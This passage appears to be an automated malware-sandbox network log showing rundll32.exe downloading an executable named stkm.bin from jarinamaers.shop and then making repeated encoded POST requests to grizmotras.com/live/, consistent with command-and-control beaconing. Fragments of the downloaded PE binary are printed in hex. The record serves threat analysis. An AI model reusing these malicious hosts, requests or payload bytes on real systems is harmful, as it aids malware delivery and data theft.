2024-04-26 21:18:35 UTC	198	IN	Data Raw: 63 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 47 68 59 31 6f 61 41 77 34 69 6e 4d 67 6c 59 33 54 45 67 76 42 75 42 55 44 75 49 58 59 67 32 67 78 5a 61 67 44 4c 78 0d 0a Data Ascii: c0QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnGhY1oaAw4inMglY3TEgvBuBUDuIXYg2gxZagDLx
2024-04-26 21:18:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49764	104.21.46.75	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:35 UTC	129	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop
2024-04-26 21:18:35 UTC	727	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:35 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 74 Last-Modified: Fri, 26 Apr 2024 21:17:21 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KvuQLrZGYSuVWRoCfSLQCJ3KG3%2BDnLflZTGZViQUVv%2BgN4ErIgsowaR8lQSRaUfc6aI9K%2BcNSWyqPZgJK5jF6V3FlloEEDR%2B6BjBzXKEoNluJvp06zcAe90vZueh6fLIXpIV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99b318af725a6-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:35 UTC	642	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 00 60 00 00 00 70 0c 00 00 60 00 00 00 70 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 00 10 00 00 00 d0 0c 00 00 10 00 00 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 10 00 00 00 e0 0c 00 00 10 00 00 00 e0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 20 00 00 00 f0 0c 00 00 20 00 00 00 f0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.data``@.pdata`p`p@@.gfids@@.rsrc@@.reloc @B
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23 46 0c 00 48 89 85 98 00 00 00 48 8d 05 1d 46 0c 00 48 89 85 b0 00 00 00 48 8d 05 17 46 0c 00 48 89 85 c8 00 00 00 48 8d 05 11 46 0c 00 48 89 85 e0 00 00 00 48 8d 05 0b 46 0c 00 48 89 85 f8 00 00 00 c7 44 24 38 b5 08 65 b4 48 89 4c 24 40 c7 44 24 50 7b 0d 6b ca 48 89 4c 24 58 c7 44 24 68 50 4c c4 a5 48 89 4c 24 70 c7 45 80 74 35 13 31 48 89 4d 88 c7 45 98 27 a3 aa 05 48 89 4d a0 c7 45 b0 bc 3e 16 a4 48 89 4d b8 c7 45 c8 80 4b ee 9e 48 89 4d d0 c7 45 e0 f2 79 36 18 48 89 4d e8 c7 45 f8 46 1c 1c e2 48 89 4d 00 c7 45 10 39 99 87 e4 48 89 4d 18 c7 45 28 97 1a 2d 5c 48 89 4d 30 c7 45 40 ac 65 8e 5c 48 89 4d 48 c7 45 58 98 3b 45 e1 48 89 4d 60 c7 45 70 Data Ascii: /FHEPH,FHEhH)FHH#FHHFHHFHHFHHFHD$8eHL$@D$P{kHL$XD$hPLHL$pEt51HME'HME>HMEKHMEy6HMEFHME9HME(-\HM0E@e\HMHEX;EHM`Ep
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 24 6c 74 0a ff c2 66 44 39 64 54 6c 75 f6 03 d2 48 8d 4c 24 6c e8 ee f7 ff ff 3b 46 f8 74 14 48 8d 54 24 40 48 8b cf ff 15 1b 44 0c 00 85 c0 75 c8 eb 0e 48 8d 4c 24 6c ff 15 e2 41 0c 00 48 8b d8 49 8b cf e8 3b 0c 00 00 eb 03 49 8b dc 48 8b 0e 48 89 19 48 85 db 74 18 41 ff c6 48 83 c6 10 41 83 fe 02 0f 82 e2 fe ff ff b8 01 00 00 00 eb 02 33 c0 4c 8d 9c 24 90 02 00 00 49 8b 5b 38 49 8b 73 40 49 8b 7b 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 d0 f8 ff ff 48 81 ec 30 08 00 00 48 8d 15 ab 43 0c 00 c7 44 24 20 4a 0d ce 09 48 8d 05 c4 40 0c 00 48 89 54 24 28 48 89 44 24 30 48 8d 05 bb 40 0c 00 48 89 44 24 48 48 8d 05 Data Ascii: HT$@IJDHHtJ&AfD9d$ltfD9dTluHL$l;FtHT$@HDuHL$lAHI;IHHHtAHA3L$I[8Is@I{HIA_A^A]A\]H\$H\|$UH$H0HCD$ JH@HT$(HD$0H@HD$HH
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c 00 48 89 85 20 03 00 00 48 8d 05 c8 3c 0c 00 48 89 85 38 03 00 00 48 8d 05 92 3d 0c 00 48 89 85 50 03 00 00 48 8d 05 8c 3d 0c 00 48 89 85 68 03 00 00 48 8d 05 86 3d 0c 00 48 89 85 80 03 00 00 48 8d 05 80 3d 0c 00 48 89 85 98 03 00 00 48 8d 05 7a 3d 0c 00 48 89 85 b0 03 00 00 48 8d 05 74 3d 0c 00 48 89 85 c8 03 00 00 48 8d 05 6e 3d 0c 00 48 89 85 e0 03 00 00 48 8d 05 68 3d 0c 00 48 89 85 f8 03 00 00 48 8d 05 62 3d 0c 00 48 89 85 10 04 00 00 48 8d 05 5c 3d 0c 00 48 89 85 28 04 00 00 48 8d 05 5e 3d 0c 00 48 89 85 40 04 00 00 48 8d 05 48 3d 0c 00 48 89 85 58 04 00 00 48 8d 05 4a 3d 0c 00 48 89 85 70 04 00 00 48 8d 05 44 3d 0c 00 48 89 85 88 04 00 00 48 8d 05 Data Ascii: -?H='HH=H H<H8H=HPH=HhH=HH=HHz=HHt=HHn=HHh=HHb=HH\=H(H^=H@HH=HXHJ=HpHD=HH
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 07 00 00 48 8b 0b 45 33 c0 8b 53 f8 48 8b 09 e8 6e f3 ff ff 48 8b 4b 08 48 89 01 48 85 c0 74 10 ff c7 48 83 c3 18 83 ff 56 72 d8 b8 01 00 00 00 4c 8d 9c 24 30 08 00 00 49 8b 5b 10 49 8b 7b 18 49 8b e3 5d c3 cc 48 89 5c 24 10 57 48 83 ec 20 8b da 48 8b f9 48 85 c9 0f 84 f5 00 00 00 85 d2 0f 84 ed 00 00 00 44 8d 42 02 b8 ab aa aa aa 41 f7 e0 d1 ea 8d 0c 95 01 00 00 00 e8 6e 5f 08 00 4c 8b c0 48 85 c0 0f 84 c7 00 00 00 48 8b d0 85 db 0f 84 b4 00 00 00 48 8d 44 24 30 48 2b f8 4c 8d 1d 00 b4 0a 00 45 33 c9 48 8d 4c 24 30 45 8d 51 03 85 db 74 0c 8a 04 0f ff cb 41 ff c1 88 01 eb 03 c6 01 00 48 ff c1 49 83 ea 01 75 e4 0f b6 4c 24 30 48 83 c7 03 8b c1 83 e1 03 48 Data Ascii: H)'uHH HE3SHnHKHHtHVrL$0I[I{I]H\$WH HHDBAn_LHHHD$0H+LE3HL$0EQtAHIuL$0HH
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 8b cd e8 8e 5a 08 00 48 8b f8 48 85 c0 74 c5 48 8b cd e8 7e 5a 08 00 48 8b e8 48 85 c0 75 0a 48 8b cf e8 ee c9 08 00 eb ab 48 8b 13 48 85 d2 74 30 48 83 7b 08 00 74 29 4c 8b 43 10 4d 85 c0 74 20 49 c1 e0 03 48 8b cf e8 10 2b 08 00 4c 8b 43 10 48 8b cd 48 8b 53 08 49 c1 e0 03 e8 fc 2a 08 00 48 8b 0b e8 ac c9 08 00 48 8b 4b 08 e8 a3 c9 08 00 33 c0 48 89 3b 48 89 6b 08 48 89 73 18 e9 53 ff ff ff cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 49 8b f0 48 8b ea 48 8b f9 33 db 48 85 ff 74 06 48 8b 47 10 eb 02 33 c0 48 3b d8 73 37 48 8b 07 48 8b 0c d8 48 83 c8 ff 48 ff c0 80 3c 01 00 75 f7 48 3b c6 75 0f 4c 8b c6 48 8b d5 e8 43 93 08 00 85 c0 74 Data Ascii: l$8Ht$@H _HytHtHHHZHHtH~ZHHuHHHt0H{t)LCMt IH+LCHHSI*HHK3H;HkHsSH\$Hl$Ht$WH IHH3HtHG3H;s7HHHH<uH;uLHCt
2024-04-26 21:18:35 UTC	1369	IN	Data Raw: 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 c0 0f 84 c8 00 00 00 c7 00 01 00 00 00 e9 b0 00 00 00 41 b8 04 00 00 00 48 8d 0d d5 0e 0b 00 e8 a0 8e 08 00 85 c0 75 24 48 83 07 04 8d 48 10 e8 08 55 08 00 48 85 c0 0f 84 92 00 00 00 c7 00 06 00 00 00 c7 40 08 01 00 00 00 eb 76 48 8b 17 48 8d 0d a6 0e 0b 00 41 b8 05 00 00 00 e8 63 8e 08 00 85 c0 75 6a 48 83 07 05 8d 48 10 e8 cb 54 08 00 48 85 c0 74 59 c7 00 06 00 00 00 89 58 08 eb 41 48 8d 56 01 48 8b cf e8 ff 01 00 00 eb 43 48 8b cf e8 3d 03 00 00 eb 39 48 8b cf e8 53 fe ff ff 48 8b f8 48 85 c0 74 26 b9 10 00 00 00 e8 89 54 08 00 48 85 c0 74 0f c7 00 02 00 00 00 48 89 78 08 48 8b d8 eb 08 48 8b cf e8 ed c3 08 00 48 8b c3 48 8b 5c 24 30 48 8b 74 24 38 48 Data Ascii: HHH>UHAHu$HHUH@vHHAcujHHTHtYXAHVHCH=9HSHHt&THtHxHHHH\$0Ht$8H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:38 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:38 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 21:18:43 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=15BLCLC%2FLBGW%2F02A5JcFvT0N7iDuj7Pbm%2FkRtzNGkjZDg199koGb77sIL4Se9t3O5rq8zgeNDzmDuvRUUQlJku7IfNOmKdbQRwRLokEo%2BFPYh%2BVurD1UbJOH0qY53qhvJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99b459d2e8dbe-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:43 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:18:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:43 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 540 Cache-Control: no-cache
2024-04-26 21:18:43 UTC	540	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 75 45 35 76 63 43 2f 48 57 43 71 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6e 64 57 70 63 79 77 52 68 57 6e 41 4b 65 31 73 44 34 2b 76 57 52 6c 4e 5a 38 4d 5a 67 50 6b 5a 79 38 6a 5a 54 59 74 76 73 37 2f 62 71 4f 71 75 50 62 61 5a 36 65 47 4a 30 6e 4d 63 4c 73 4e 72 4b 63 61 42 39 4f 4f 75 65 44 66 2b 33 Data Ascii: YjOeEyiMk3RuE5vcC/HWCqZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHndWpcywRhWnAKe1sD4+vWRlNZ8MZgPkZy8jZTYtvs7/bqOquPbaZ6eGJ0nMcLsNrKcaB9OOueDf+3
2024-04-26 21:18:44 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4za5w%2FduDWYgp4R87eatEnK1AA%2BmBN%2BOxDJQuNdwyWqJCAkvSWiROZ%2FY4mWxAeamQWNvH922USuyRzIpugJeuJbGRz1LBrsgvDxyGu%2BIWxqNe6O9NTsW6qqT3F95JzdLfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99b63782221fd-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49768	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:44 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:44 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 74 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RtE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 21:18:49 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8Xi81F0nSo4IddhkbMkptghSmX5Dn94cv69oeRSeS%2FyZ7OxkLzyqZ7Z5D7JJsu%2BnvgvJVgB8QS6ywHBhljhjatQayvOCWkKC7HM92lSWxEdOOEJ0gbxNTjZ3ggS4utl3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99b6b7d51a52e-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:49 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:18:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49769	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:49 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:49 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 73 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RsE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 21:18:53 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EjOTgzcNJDD5aDouGaLAiG36InG8a%2FKfFSvIJdJoZrwNYu%2BYRzBqOjDvN7ooRGvLdJwWByHEFvVBTKynhUbAcqeGnL5JOZ%2BBWCCCpymIDcUQNsJ%2Bp6z5dgSLIBT63PzVpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99b897cf78da8-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:53 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:18:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49770	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
